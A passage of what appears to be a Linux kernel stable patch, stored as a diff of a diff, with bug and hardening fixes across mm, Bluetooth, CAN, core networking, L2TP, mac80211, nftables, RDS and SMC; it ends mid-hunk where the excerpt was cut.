+--- a/mm/memcontrol.c
++++ b/mm/memcontrol.c
+@@ -3910,6 +3910,10 @@ static int mem_cgroup_move_charge_write(struct cgroup_subsys_state *css,
+ {
+ 	struct mem_cgroup *memcg = mem_cgroup_from_css(css);
+ 
++	pr_warn_once("Cgroup memory moving (move_charge_at_immigrate) is deprecated. "
++		     "Please report your usecase to linux-mm@kvack.org if you "
++		     "depend on this functionality.\n");
++
+ 	if (val & ~MOVE_MASK)
+ 		return -EINVAL;
+ 
+diff --git a/mm/memory-failure.c b/mm/memory-failure.c
+index bead6bccc7f28..4457f9423e2c1 100644
+--- a/mm/memory-failure.c
++++ b/mm/memory-failure.c
+@@ -1020,7 +1020,7 @@ static int me_pagecache_dirty(struct page_state *ps, struct page *p)
+  * cache and swap cache(ie. page is freshly swapped in). So it could be
+  * referenced concurrently by 2 types of PTEs:
+  * normal PTEs and swap PTEs. We try to handle them consistently by calling
+- * try_to_unmap(TTU_IGNORE_HWPOISON) to convert the normal PTEs to swap PTEs,
++ * try_to_unmap(!TTU_HWPOISON) to convert the normal PTEs to swap PTEs,
+  * and then
+  *      - clear dirty bit to prevent IO
+  *      - remove from LRU
+@@ -1401,7 +1401,7 @@ static bool hwpoison_user_mappings(struct page *p, unsigned long pfn,
+ 				  int flags, struct page *hpage)
+ {
+ 	struct folio *folio = page_folio(hpage);
+-	enum ttu_flags ttu = TTU_IGNORE_MLOCK | TTU_SYNC;
++	enum ttu_flags ttu = TTU_IGNORE_MLOCK | TTU_SYNC | TTU_HWPOISON;
+ 	struct address_space *mapping;
+ 	LIST_HEAD(tokill);
+ 	bool unmap_success;
+@@ -1431,7 +1431,7 @@ static bool hwpoison_user_mappings(struct page *p, unsigned long pfn,
+ 
+ 	if (PageSwapCache(p)) {
+ 		pr_err("%#lx: keeping poisoned page in swap cache\n", pfn);
+-		ttu |= TTU_IGNORE_HWPOISON;
++		ttu &= ~TTU_HWPOISON;
+ 	}
+ 
+ 	/*
+@@ -1446,7 +1446,7 @@ static bool hwpoison_user_mappings(struct page *p, unsigned long pfn,
+ 		if (page_mkclean(hpage)) {
+ 			SetPageDirty(hpage);
+ 		} else {
+-			ttu |= TTU_IGNORE_HWPOISON;
++			ttu &= ~TTU_HWPOISON;
+ 			pr_info("%#lx: corrupted page was clean: dropped without side effects\n",
+ 				pfn);
+ 		}
+diff --git a/mm/memory-tiers.c b/mm/memory-tiers.c
+index fa8c9d07f9ce9..ba863f46759d3 100644
+--- a/mm/memory-tiers.c
++++ b/mm/memory-tiers.c
+@@ -211,8 +211,8 @@ static struct memory_tier *find_create_memory_tier(struct memory_dev_type *memty
+ 
+ 	ret = device_register(&new_memtier->dev);
+ 	if (ret) {
+-		list_del(&memtier->list);
+-		put_device(&memtier->dev);
++		list_del(&new_memtier->list);
++		put_device(&new_memtier->dev);
+ 		return ERR_PTR(ret);
+ 	}
+ 	memtier = new_memtier;
+diff --git a/mm/rmap.c b/mm/rmap.c
+index 2ec925e5fa6a9..7da2d8d097d9b 100644
+--- a/mm/rmap.c
++++ b/mm/rmap.c
+@@ -1623,7 +1623,7 @@ static bool try_to_unmap_one(struct folio *folio, struct vm_area_struct *vma,
+ 		/* Update high watermark before we lower rss */
+ 		update_hiwater_rss(mm);
+ 
+-		if (PageHWPoison(subpage) && !(flags & TTU_IGNORE_HWPOISON)) {
++		if (PageHWPoison(subpage) && (flags & TTU_HWPOISON)) {
+ 			pteval = swp_entry_to_pte(make_hwpoison_entry(subpage));
+ 			if (folio_test_hugetlb(folio)) {
+ 				hugetlb_count_sub(folio_nr_pages(folio), mm);
+diff --git a/net/bluetooth/hci_conn.c b/net/bluetooth/hci_conn.c
+index 3c3b79f2e4c03..09e7f841f149d 100644
+--- a/net/bluetooth/hci_conn.c
++++ b/net/bluetooth/hci_conn.c
+@@ -1983,16 +1983,14 @@ static void hci_iso_qos_setup(struct hci_dev *hdev, struct hci_conn *conn,
+ 		qos->latency = conn->le_conn_latency;
+ }
+ 
+-static struct hci_conn *hci_bind_bis(struct hci_conn *conn,
+-				     struct bt_iso_qos *qos)
++static void hci_bind_bis(struct hci_conn *conn,
++			 struct bt_iso_qos *qos)
+ {
+ 	/* Update LINK PHYs according to QoS preference */
+ 	conn->le_tx_phy = qos->out.phy;
+ 	conn->le_tx_phy = qos->out.phy;
+ 	conn->iso_qos = *qos;
+ 	conn->state = BT_BOUND;
+-
+-	return conn;
+ }
+ 
+ static int create_big_sync(struct hci_dev *hdev, void *data)
+@@ -2128,11 +2126,7 @@ struct hci_conn *hci_connect_bis(struct hci_dev *hdev, bdaddr_t *dst,
+ 	if (IS_ERR(conn))
+ 		return conn;
+ 
+-	conn = hci_bind_bis(conn, qos);
+-	if (!conn) {
+-		hci_conn_drop(conn);
+-		return ERR_PTR(-ENOMEM);
+-	}
++	hci_bind_bis(conn, qos);
+ 
+ 	/* Add Basic Announcement into Peridic Adv Data if BASE is set */
+ 	if (base_len && base) {
+diff --git a/net/bluetooth/l2cap_core.c b/net/bluetooth/l2cap_core.c
+index 9fdede5fe71c7..da85768b04b76 100644
+--- a/net/bluetooth/l2cap_core.c
++++ b/net/bluetooth/l2cap_core.c
+@@ -2683,14 +2683,6 @@ int l2cap_chan_send(struct l2cap_chan *chan, struct msghdr *msg, size_t len)
+ 		if (IS_ERR(skb))
+ 			return PTR_ERR(skb);
+ 
+-		/* Channel lock is released before requesting new skb and then
+-		 * reacquired thus we need to recheck channel state.
+-		 */
+-		if (chan->state != BT_CONNECTED) {
+-			kfree_skb(skb);
+-			return -ENOTCONN;
+-		}
+-
+ 		l2cap_do_send(chan, skb);
+ 		return len;
+ 	}
+@@ -2735,14 +2727,6 @@ int l2cap_chan_send(struct l2cap_chan *chan, struct msghdr *msg, size_t len)
+ 		if (IS_ERR(skb))
+ 			return PTR_ERR(skb);
+ 
+-		/* Channel lock is released before requesting new skb and then
+-		 * reacquired thus we need to recheck channel state.
+-		 */
+-		if (chan->state != BT_CONNECTED) {
+-			kfree_skb(skb);
+-			return -ENOTCONN;
+-		}
+-
+ 		l2cap_do_send(chan, skb);
+ 		err = len;
+ 		break;
+@@ -2763,14 +2747,6 @@ int l2cap_chan_send(struct l2cap_chan *chan, struct msghdr *msg, size_t len)
+ 		 */
+ 		err = l2cap_segment_sdu(chan, &seg_queue, msg, len);
+ 
+-		/* The channel could have been closed while segmenting,
+-		 * check that it is still connected.
+-		 */
+-		if (chan->state != BT_CONNECTED) {
+-			__skb_queue_purge(&seg_queue);
+-			err = -ENOTCONN;
+-		}
+-
+ 		if (err)
+ 			break;
+ 
+diff --git a/net/bluetooth/l2cap_sock.c b/net/bluetooth/l2cap_sock.c
+index ca8f07f3542b8..eebe256104bc0 100644
+--- a/net/bluetooth/l2cap_sock.c
++++ b/net/bluetooth/l2cap_sock.c
+@@ -1624,6 +1624,14 @@ static struct sk_buff *l2cap_sock_alloc_skb_cb(struct l2cap_chan *chan,
+ 	if (!skb)
+ 		return ERR_PTR(err);
+ 
++	/* Channel lock is released before requesting new skb and then
++	 * reacquired thus we need to recheck channel state.
++	 */
++	if (chan->state != BT_CONNECTED) {
++		kfree_skb(skb);
++		return ERR_PTR(-ENOTCONN);
++	}
++
+ 	skb->priority = sk->sk_priority;
+ 
+ 	bt_cb(skb)->l2cap.chan = chan;
+diff --git a/net/can/isotp.c b/net/can/isotp.c
+index fc81d77724a13..9bc344851704e 100644
+--- a/net/can/isotp.c
++++ b/net/can/isotp.c
+@@ -1220,6 +1220,9 @@ static int isotp_bind(struct socket *sock, struct sockaddr *uaddr, int len)
+ 	if (len < ISOTP_MIN_NAMELEN)
+ 		return -EINVAL;
+ 
++	if (addr->can_family != AF_CAN)
++		return -EINVAL;
++
+ 	/* sanitize tx CAN identifier */
+ 	if (tx_id & CAN_EFF_FLAG)
+ 		tx_id &= (CAN_EFF_FLAG | CAN_EFF_MASK);
+diff --git a/net/core/scm.c b/net/core/scm.c
+index 5c356f0dee30c..acb7d776fa6ec 100644
+--- a/net/core/scm.c
++++ b/net/core/scm.c
+@@ -229,6 +229,8 @@ int put_cmsg(struct msghdr * msg, int level, int type, int len, void *data)
+ 	if (msg->msg_control_is_user) {
+ 		struct cmsghdr __user *cm = msg->msg_control_user;
+ 
++		check_object_size(data, cmlen - sizeof(*cm), true);
++
+ 		if (!user_write_access_begin(cm, cmlen))
+ 			goto efault;
+ 
+diff --git a/net/core/sock.c b/net/core/sock.c
+index ba6ea61b3458b..4dfdcdfd00114 100644
+--- a/net/core/sock.c
++++ b/net/core/sock.c
+@@ -3359,7 +3359,7 @@ void sk_stop_timer_sync(struct sock *sk, struct timer_list *timer)
+ }
+ EXPORT_SYMBOL(sk_stop_timer_sync);
+ 
+-void sock_init_data(struct socket *sock, struct sock *sk)
++void sock_init_data_uid(struct socket *sock, struct sock *sk, kuid_t uid)
+ {
+ 	sk_init_common(sk);
+ 	sk->sk_send_head	=	NULL;
+@@ -3378,11 +3378,10 @@ void sock_init_data(struct socket *sock, struct sock *sk)
+ 		sk->sk_type	=	sock->type;
+ 		RCU_INIT_POINTER(sk->sk_wq, &sock->wq);
+ 		sock->sk	=	sk;
+-		sk->sk_uid	=	SOCK_INODE(sock)->i_uid;
+ 	} else {
+ 		RCU_INIT_POINTER(sk->sk_wq, NULL);
+-		sk->sk_uid	=	make_kuid(sock_net(sk)->user_ns, 0);
+ 	}
++	sk->sk_uid	=	uid;
+ 
+ 	rwlock_init(&sk->sk_callback_lock);
+ 	if (sk->sk_kern_sock)
+@@ -3440,6 +3439,16 @@ void sock_init_data(struct socket *sock, struct sock *sk)
+ 	refcount_set(&sk->sk_refcnt, 1);
+ 	atomic_set(&sk->sk_drops, 0);
+ }
++EXPORT_SYMBOL(sock_init_data_uid);
++
++void sock_init_data(struct socket *sock, struct sock *sk)
++{
++	kuid_t uid = sock ?
++		SOCK_INODE(sock)->i_uid :
++		make_kuid(sock_net(sk)->user_ns, 0);
++
++	sock_init_data_uid(sock, sk, uid);
++}
+ EXPORT_SYMBOL(sock_init_data);
+ 
+ void lock_sock_nested(struct sock *sk, int subclass)
+diff --git a/net/ipv4/inet_hashtables.c b/net/ipv4/inet_hashtables.c
+index a5711b8f4cb19..cd8b2f7a8f341 100644
+--- a/net/ipv4/inet_hashtables.c
++++ b/net/ipv4/inet_hashtables.c
+@@ -1008,17 +1008,7 @@ int __inet_hash_connect(struct inet_timewait_death_row *death_row,
+ 	u32 index;
+ 
+ 	if (port) {
+-		head = &hinfo->bhash[inet_bhashfn(net, port,
+-						  hinfo->bhash_size)];
+-		tb = inet_csk(sk)->icsk_bind_hash;
+-		spin_lock_bh(&head->lock);
+-		if (sk_head(&tb->owners) == sk && !sk->sk_bind_node.next) {
+-			inet_ehash_nolisten(sk, NULL, NULL);
+-			spin_unlock_bh(&head->lock);
+-			return 0;
+-		}
+-		spin_unlock(&head->lock);
+-		/* No definite answer... Walk to established hash table */
++		local_bh_disable();
+ 		ret = check_established(death_row, sk, port, NULL);
+ 		local_bh_enable();
+ 		return ret;
+diff --git a/net/l2tp/l2tp_ppp.c b/net/l2tp/l2tp_ppp.c
+index db2e584c625e5..f011af6601c9c 100644
+--- a/net/l2tp/l2tp_ppp.c
++++ b/net/l2tp/l2tp_ppp.c
+@@ -650,54 +650,22 @@ static int pppol2tp_tunnel_mtu(const struct l2tp_tunnel *tunnel)
+ 	return mtu - PPPOL2TP_HEADER_OVERHEAD;
+ }
+ 
+-/* connect() handler. Attach a PPPoX socket to a tunnel UDP socket
+- */
+-static int pppol2tp_connect(struct socket *sock, struct sockaddr *uservaddr,
+-			    int sockaddr_len, int flags)
++static struct l2tp_tunnel *pppol2tp_tunnel_get(struct net *net,
++					       const struct l2tp_connect_info *info,
++					       bool *new_tunnel)
+ {
+-	struct sock *sk = sock->sk;
+-	struct pppox_sock *po = pppox_sk(sk);
+-	struct l2tp_session *session = NULL;
+-	struct l2tp_connect_info info;
+ 	struct l2tp_tunnel *tunnel;
+-	struct pppol2tp_session *ps;
+-	struct l2tp_session_cfg cfg = { 0, };
+-	bool drop_refcnt = false;
+-	bool drop_tunnel = false;
+-	bool new_session = false;
+-	bool new_tunnel = false;
+ 	int error;
+ 
+-	error = pppol2tp_sockaddr_get_info(uservaddr, sockaddr_len, &info);
+-	if (error < 0)
+-		return error;
++	*new_tunnel = false;
+ 
+-	lock_sock(sk);
+-
+-	/* Check for already bound sockets */
+-	error = -EBUSY;
+-	if (sk->sk_state & PPPOX_CONNECTED)
+-		goto end;
+-
+-	/* We don't supporting rebinding anyway */
+-	error = -EALREADY;
+-	if (sk->sk_user_data)
+-		goto end; /* socket is already attached */
+-
+-	/* Don't bind if tunnel_id is 0 */
+-	error = -EINVAL;
+-	if (!info.tunnel_id)
+-		goto end;
+-
+-	tunnel = l2tp_tunnel_get(sock_net(sk), info.tunnel_id);
+-	if (tunnel)
+-		drop_tunnel = true;
++	tunnel = l2tp_tunnel_get(net, info->tunnel_id);
+ 
+ 	/* Special case: create tunnel context if session_id and
+ 	 * peer_session_id is 0. Otherwise look up tunnel using supplied
+ 	 * tunnel id.
+ 	 */
+-	if (!info.session_id && !info.peer_session_id) {
++	if (!info->session_id && !info->peer_session_id) {
+ 		if (!tunnel) {
+ 			struct l2tp_tunnel_cfg tcfg = {
+ 				.encap = L2TP_ENCAPTYPE_UDP,
+@@ -706,40 +674,82 @@ static int pppol2tp_connect(struct socket *sock, struct sockaddr *uservaddr,
+ 			/* Prevent l2tp_tunnel_register() from trying to set up
+ 			 * a kernel socket.
+ 			 */
+-			if (info.fd < 0) {
+-				error = -EBADF;
+-				goto end;
+-			}
++			if (info->fd < 0)
++				return ERR_PTR(-EBADF);
+ 
+-			error = l2tp_tunnel_create(info.fd,
+-						   info.version,
+-						   info.tunnel_id,
+-						   info.peer_tunnel_id, &tcfg,
++			error = l2tp_tunnel_create(info->fd,
++						   info->version,
++						   info->tunnel_id,
++						   info->peer_tunnel_id, &tcfg,
+ 						   &tunnel);
+ 			if (error < 0)
+-				goto end;
++				return ERR_PTR(error);
+ 
+ 			l2tp_tunnel_inc_refcount(tunnel);
+-			error = l2tp_tunnel_register(tunnel, sock_net(sk),
+-						     &tcfg);
++			error = l2tp_tunnel_register(tunnel, net, &tcfg);
+ 			if (error < 0) {
+ 				kfree(tunnel);
+-				goto end;
++				return ERR_PTR(error);
+ 			}
+-			drop_tunnel = true;
+-			new_tunnel = true;
++
++			*new_tunnel = true;
+ 		}
+ 	} else {
+ 		/* Error if we can't find the tunnel */
+-		error = -ENOENT;
+ 		if (!tunnel)
+-			goto end;
++			return ERR_PTR(-ENOENT);
+ 
+ 		/* Error if socket is not prepped */
+-		if (!tunnel->sock)
+-			goto end;
++		if (!tunnel->sock) {
++			l2tp_tunnel_dec_refcount(tunnel);
++			return ERR_PTR(-ENOENT);
++		}
+ 	}
+ 
++	return tunnel;
++}
++
++/* connect() handler. Attach a PPPoX socket to a tunnel UDP socket
++ */
++static int pppol2tp_connect(struct socket *sock, struct sockaddr *uservaddr,
++			    int sockaddr_len, int flags)
++{
++	struct sock *sk = sock->sk;
++	struct pppox_sock *po = pppox_sk(sk);
++	struct l2tp_session *session = NULL;
++	struct l2tp_connect_info info;
++	struct l2tp_tunnel *tunnel;
++	struct pppol2tp_session *ps;
++	struct l2tp_session_cfg cfg = { 0, };
++	bool drop_refcnt = false;
++	bool new_session = false;
++	bool new_tunnel = false;
++	int error;
++
++	error = pppol2tp_sockaddr_get_info(uservaddr, sockaddr_len, &info);
++	if (error < 0)
++		return error;
++
++	/* Don't bind if tunnel_id is 0 */
++	if (!info.tunnel_id)
++		return -EINVAL;
++
++	tunnel = pppol2tp_tunnel_get(sock_net(sk), &info, &new_tunnel);
++	if (IS_ERR(tunnel))
++		return PTR_ERR(tunnel);
++
++	lock_sock(sk);
++
++	/* Check for already bound sockets */
++	error = -EBUSY;
++	if (sk->sk_state & PPPOX_CONNECTED)
++		goto end;
++
++	/* We don't supporting rebinding anyway */
++	error = -EALREADY;
++	if (sk->sk_user_data)
++		goto end; /* socket is already attached */
++
+ 	if (tunnel->peer_tunnel_id == 0)
+ 		tunnel->peer_tunnel_id = info.peer_tunnel_id;
+ 
+@@ -840,8 +850,7 @@ end:
+ 	}
+ 	if (drop_refcnt)
+ 		l2tp_session_dec_refcount(session);
+-	if (drop_tunnel)
+-		l2tp_tunnel_dec_refcount(tunnel);
++	l2tp_tunnel_dec_refcount(tunnel);
+ 	release_sock(sk);
+ 
+ 	return error;
+diff --git a/net/mac80211/cfg.c b/net/mac80211/cfg.c
+index 3c66e03774fbe..e8beec0a0ae1c 100644
+--- a/net/mac80211/cfg.c
++++ b/net/mac80211/cfg.c
+@@ -4623,6 +4623,20 @@ unlock:
+ 	sdata_unlock(sdata);
+ }
+ 
++void ieee80211_color_collision_detection_work(struct work_struct *work)
++{
++	struct delayed_work *delayed_work = to_delayed_work(work);
++	struct ieee80211_link_data *link =
++		container_of(delayed_work, struct ieee80211_link_data,
++			     color_collision_detect_work);
++	struct ieee80211_sub_if_data *sdata = link->sdata;
++
++	sdata_lock(sdata);
++	cfg80211_obss_color_collision_notify(sdata->dev, link->color_bitmap,
++					     GFP_KERNEL);
++	sdata_unlock(sdata);
++}
++
+ void ieee80211_color_change_finish(struct ieee80211_vif *vif)
+ {
+ 	struct ieee80211_sub_if_data *sdata = vif_to_sdata(vif);
+@@ -4637,11 +4651,21 @@ ieeee80211_obss_color_collision_notify(struct ieee80211_vif *vif,
+ 				       u64 color_bitmap, gfp_t gfp)
+ {
+ 	struct ieee80211_sub_if_data *sdata = vif_to_sdata(vif);
++	struct ieee80211_link_data *link = &sdata->deflink;
+ 
+ 	if (sdata->vif.bss_conf.color_change_active || sdata->vif.bss_conf.csa_active)
+ 		return;
+ 
+-	cfg80211_obss_color_collision_notify(sdata->dev, color_bitmap, gfp);
++	if (delayed_work_pending(&link->color_collision_detect_work))
++		return;
++
++	link->color_bitmap = color_bitmap;
++	/* queue the color collision detection event every 500 ms in order to
++	 * avoid sending too much netlink messages to userspace.
++	 */
++	ieee80211_queue_delayed_work(&sdata->local->hw,
++				     &link->color_collision_detect_work,
++				     msecs_to_jiffies(500));
+ }
+ EXPORT_SYMBOL_GPL(ieeee80211_obss_color_collision_notify);
+ 
+diff --git a/net/mac80211/ieee80211_i.h b/net/mac80211/ieee80211_i.h
+index a8862f2c64ec0..e57001e00a3d0 100644
+--- a/net/mac80211/ieee80211_i.h
++++ b/net/mac80211/ieee80211_i.h
+@@ -972,6 +972,8 @@ struct ieee80211_link_data {
+ 	struct cfg80211_chan_def csa_chandef;
+ 
+ 	struct work_struct color_change_finalize_work;
++	struct delayed_work color_collision_detect_work;
++	u64 color_bitmap;
+ 
+ 	/* context reservation -- protected with chanctx_mtx */
+ 	struct ieee80211_chanctx *reserved_chanctx;
+@@ -1916,6 +1918,7 @@ int ieee80211_channel_switch(struct wiphy *wiphy, struct net_device *dev,
+ 
+ /* color change handling */
+ void ieee80211_color_change_finalize_work(struct work_struct *work);
++void ieee80211_color_collision_detection_work(struct work_struct *work);
+ 
+ /* interface handling */
+ #define MAC80211_SUPPORTED_FEATURES_TX	(NETIF_F_IP_CSUM | NETIF_F_IPV6_CSUM | \
+diff --git a/net/mac80211/link.c b/net/mac80211/link.c
+index e309708abae8b..a1b3031fefce2 100644
+--- a/net/mac80211/link.c
++++ b/net/mac80211/link.c
+@@ -39,6 +39,8 @@ void ieee80211_link_init(struct ieee80211_sub_if_data *sdata,
+ 		  ieee80211_csa_finalize_work);
+ 	INIT_WORK(&link->color_change_finalize_work,
+ 		  ieee80211_color_change_finalize_work);
++	INIT_DELAYED_WORK(&link->color_collision_detect_work,
++			  ieee80211_color_collision_detection_work);
+ 	INIT_LIST_HEAD(&link->assigned_chanctx_list);
+ 	INIT_LIST_HEAD(&link->reserved_chanctx_list);
+ 	INIT_DELAYED_WORK(&link->dfs_cac_timer_work,
+@@ -66,6 +68,7 @@ void ieee80211_link_stop(struct ieee80211_link_data *link)
+ 	if (link->sdata->vif.type == NL80211_IFTYPE_STATION)
+ 		ieee80211_mgd_stop_link(link);
+ 
++	cancel_delayed_work_sync(&link->color_collision_detect_work);
+ 	ieee80211_link_release_channel(link);
+ }
+ 
+diff --git a/net/mac80211/rx.c b/net/mac80211/rx.c
+index 8f0d7c666df7e..44e407e1a14c7 100644
+--- a/net/mac80211/rx.c
++++ b/net/mac80211/rx.c
+@@ -4073,9 +4073,6 @@ static void ieee80211_invoke_rx_handlers(struct ieee80211_rx_data *rx)
+ static bool
+ ieee80211_rx_is_valid_sta_link_id(struct ieee80211_sta *sta, u8 link_id)
+ {
+-	if (!sta->mlo)
+-		return false;
+-
+ 	return !!(sta->valid_links & BIT(link_id));
+ }
+ 
+@@ -4097,13 +4094,8 @@ static bool ieee80211_rx_data_set_link(struct ieee80211_rx_data *rx,
+ }
+ 
+ static bool ieee80211_rx_data_set_sta(struct ieee80211_rx_data *rx,
+-				      struct ieee80211_sta *pubsta,
+-				      int link_id)
++				      struct sta_info *sta, int link_id)
+ {
+-	struct sta_info *sta;
+-
+-	sta = container_of(pubsta, struct sta_info, sta);
+-
+ 	rx->link_id = link_id;
+ 	rx->sta = sta;
+ 
+@@ -4141,7 +4133,7 @@ void ieee80211_release_reorder_timeout(struct sta_info *sta, int tid)
+ 	if (sta->sta.valid_links)
+ 		link_id = ffs(sta->sta.valid_links) - 1;
+ 
+-	if (!ieee80211_rx_data_set_sta(&rx, &sta->sta, link_id))
++	if (!ieee80211_rx_data_set_sta(&rx, sta, link_id))
+ 		return;
+ 
+ 	tid_agg_rx = rcu_dereference(sta->ampdu_mlme.tid_rx[tid]);
+@@ -4187,7 +4179,7 @@ void ieee80211_mark_rx_ba_filtered_frames(struct ieee80211_sta *pubsta, u8 tid,
+ 
+ 	sta = container_of(pubsta, struct sta_info, sta);
+ 
+-	if (!ieee80211_rx_data_set_sta(&rx, pubsta, -1))
++	if (!ieee80211_rx_data_set_sta(&rx, sta, -1))
+ 		return;
+ 
+ 	rcu_read_lock();
+@@ -4864,7 +4856,8 @@ static bool ieee80211_prepare_and_rx_handle(struct ieee80211_rx_data *rx,
+ 		hdr = (struct ieee80211_hdr *)rx->skb->data;
+ 	}
+ 
+-	if (unlikely(rx->sta && rx->sta->sta.mlo)) {
++	if (unlikely(rx->sta && rx->sta->sta.mlo) &&
++	    is_unicast_ether_addr(hdr->addr1)) {
+ 		/* translate to MLD addresses */
+ 		if (ether_addr_equal(link->conf->addr, hdr->addr1))
+ 			ether_addr_copy(hdr->addr1, rx->sdata->vif.addr);
+@@ -4894,6 +4887,7 @@ static void __ieee80211_rx_handle_8023(struct ieee80211_hw *hw,
+ 	struct ieee80211_rx_status *status = IEEE80211_SKB_RXCB(skb);
+ 	struct ieee80211_fast_rx *fast_rx;
+ 	struct ieee80211_rx_data rx;
++	struct sta_info *sta;
+ 	int link_id = -1;
+ 
+ 	memset(&rx, 0, sizeof(rx));
+@@ -4921,7 +4915,8 @@ static void __ieee80211_rx_handle_8023(struct ieee80211_hw *hw,
+ 	 * link_id is used only for stats purpose and updating the stats on
+ 	 * the deflink is fine?
+ 	 */
+-	if (!ieee80211_rx_data_set_sta(&rx, pubsta, link_id))
++	sta = container_of(pubsta, struct sta_info, sta);
++	if (!ieee80211_rx_data_set_sta(&rx, sta, link_id))
+ 		goto drop;
+ 
+ 	fast_rx = rcu_dereference(rx.sta->fast_rx);
+@@ -4961,7 +4956,7 @@ static bool ieee80211_rx_for_interface(struct ieee80211_rx_data *rx,
+ 			link_id = status->link_id;
+ 	}
+ 
+-	if (!ieee80211_rx_data_set_sta(rx, &sta->sta, link_id))
++	if (!ieee80211_rx_data_set_sta(rx, sta, link_id))
+ 		return false;
+ 
+ 	return ieee80211_prepare_and_rx_handle(rx, skb, consume);
+@@ -5028,7 +5023,8 @@ static void __ieee80211_rx_handle_packet(struct ieee80211_hw *hw,
+ 			link_id = status->link_id;
+ 
+ 		if (pubsta) {
+-			if (!ieee80211_rx_data_set_sta(&rx, pubsta, link_id))
++			sta = container_of(pubsta, struct sta_info, sta);
++			if (!ieee80211_rx_data_set_sta(&rx, sta, link_id))
+ 				goto out;
+ 
+ 			/*
+@@ -5065,8 +5061,7 @@ static void __ieee80211_rx_handle_packet(struct ieee80211_hw *hw,
+ 			}
+ 
+ 			rx.sdata = prev_sta->sdata;
+-			if (!ieee80211_rx_data_set_sta(&rx, &prev_sta->sta,
+-						       link_id))
++			if (!ieee80211_rx_data_set_sta(&rx, prev_sta, link_id))
+ 				goto out;
+ 
+ 			if (!status->link_valid && prev_sta->sta.mlo)
+@@ -5079,8 +5074,7 @@ static void __ieee80211_rx_handle_packet(struct ieee80211_hw *hw,
+ 
+ 		if (prev_sta) {
+ 			rx.sdata = prev_sta->sdata;
+-			if (!ieee80211_rx_data_set_sta(&rx, &prev_sta->sta,
+-						       link_id))
++			if (!ieee80211_rx_data_set_sta(&rx, prev_sta, link_id))
+ 				goto out;
+ 
+ 			if (!status->link_valid && prev_sta->sta.mlo)
+diff --git a/net/mac80211/sta_info.c b/net/mac80211/sta_info.c
+index cebfd148bb406..3603cbc167570 100644
+--- a/net/mac80211/sta_info.c
++++ b/net/mac80211/sta_info.c
+@@ -2380,7 +2380,7 @@ static void sta_stats_decode_rate(struct ieee80211_local *local, u32 rate,
+ 
+ static int sta_set_rate_info_rx(struct sta_info *sta, struct rate_info *rinfo)
+ {
+-	u16 rate = READ_ONCE(sta_get_last_rx_stats(sta)->last_rate);
++	u32 rate = READ_ONCE(sta_get_last_rx_stats(sta)->last_rate);
+ 
+ 	if (rate == STA_STATS_RATE_INVALID)
+ 		return -EINVAL;
+diff --git a/net/mac80211/tx.c b/net/mac80211/tx.c
+index 6409097a56c7a..6a1708db652f2 100644
+--- a/net/mac80211/tx.c
++++ b/net/mac80211/tx.c
+@@ -4395,7 +4395,7 @@ static void ieee80211_mlo_multicast_tx(struct net_device *dev,
+ 	u32 ctrl_flags = IEEE80211_TX_CTRL_MCAST_MLO_FIRST_TX;
+ 
+ 	if (hweight16(links) == 1) {
+-		ctrl_flags |= u32_encode_bits(ffs(links) - 1,
++		ctrl_flags |= u32_encode_bits(__ffs(links),
+ 					      IEEE80211_TX_CTRL_MLO_LINK);
+ 
+ 		__ieee80211_subif_start_xmit(skb, sdata->dev, 0, ctrl_flags,
+diff --git a/net/netfilter/nf_tables_api.c b/net/netfilter/nf_tables_api.c
+index 3ba8c291fcaa7..dca5352bdf3d7 100644
+--- a/net/netfilter/nf_tables_api.c
++++ b/net/netfilter/nf_tables_api.c
+@@ -6951,6 +6951,9 @@ static int nf_tables_newobj(struct sk_buff *skb, const struct nfnl_info *info,
+ 			return -EOPNOTSUPP;
+ 
+ 		type = __nft_obj_type_get(objtype);
++		if (WARN_ON_ONCE(!type))
++			return -ENOENT;
++
+ 		nft_ctx_init(&ctx, net, skb, info->nlh, family, table, NULL, nla);
+ 
+ 		return nf_tables_updobj(&ctx, type, nla[NFTA_OBJ_DATA], obj);
+diff --git a/net/rds/message.c b/net/rds/message.c
+index 9402bc941823f..f71e1237e03d4 100644
+--- a/net/rds/message.c
++++ b/net/rds/message.c
+@@ -118,7 +118,7 @@ static void rds_rm_zerocopy_callback(struct rds_sock *rs,
+ 	ck = &info->zcookies;
+ 	memset(ck, 0, sizeof(*ck));
+ 	WARN_ON(!rds_zcookie_add(info, cookie));
+-	list_add_tail(&q->zcookie_head, &info->rs_zcookie_next);
++	list_add_tail(&info->rs_zcookie_next, &q->zcookie_head);
+ 
+ 	spin_unlock_irqrestore(&q->lock, flags);
+ 	/* caller invokes rds_wake_sk_sleep() */
+diff --git a/net/smc/af_smc.c b/net/smc/af_smc.c
+index e12d4fa5aece6..d9413d43b1045 100644
+--- a/net/smc/af_smc.c
++++ b/net/smc/af_smc.c
+@@ -1826,8 +1826,10 @@ static int smcr_serv_conf_first_link(struct smc_sock *smc)
+ 	smc_llc_link_active(link);
+ 	smcr_lgr_set_type(link->lgr, SMC_LGR_SINGLE);
+ 
++	mutex_lock(&link->lgr->llc_conf_mutex);
+ 	/* initial contact - try to establish second link */
+ 	smc_llc_srv_add_link(link, NULL);
++	mutex_unlock(&link->lgr->llc_conf_mutex);
+ 	return 0;
+ }
+ 
+diff --git a/net/smc/smc_core.c b/net/smc/smc_core.c
+index c305d8dd23f80..c19d4b7c1f28a 100644
+--- a/net/smc/smc_core.c
++++ b/net/smc/smc_core.c
+@@ -1120,8 +1120,9 @@ static void smcr_buf_unuse(struct smc_buf_desc *buf_desc, bool is_rmb,
+ 
+ 		smc_buf_free(lgr, is_rmb, buf_desc);
+ 	} else {
+-		buf_desc->used = 0;
+-		memset(buf_desc->cpu_addr, 0, buf_desc->len);
++		/* memzero_explicit provides potential memory barrier semantics */
++		memzero_explicit(buf_desc->cpu_addr, buf_desc->len);
++		WRITE_ONCE(buf_desc->used, 0);
+ 	}
+ }
+ 
+@@ -1132,19 +1133,17 @@ static void smc_buf_unuse(struct smc_connection *conn,
+ 		if (!lgr->is_smcd && conn->sndbuf_desc->is_vm) {
+ 			smcr_buf_unuse(conn->sndbuf_desc, false, lgr);
+ 		} else {
+-			conn->sndbuf_desc->used = 0;
+-			memset(conn->sndbuf_desc->cpu_addr, 0,
+-			       conn->sndbuf_desc->len);
++			memzero_explicit(conn->sndbuf_desc->cpu_addr, conn->sndbuf_desc->len);
++			WRITE_ONCE(conn->sndbuf_desc->used, 0);
+ 		}
+ 	}
+ 	if (conn->rmb_desc) {
+ 		if (!lgr->is_smcd) {
+ 			smcr_buf_unuse(conn->rmb_desc, true, lgr);
+ 		} else {
+-			conn->rmb_desc->used = 0;
+-			memset(conn->rmb_desc->cpu_addr, 0,
+-			       conn->rmb_desc->len +
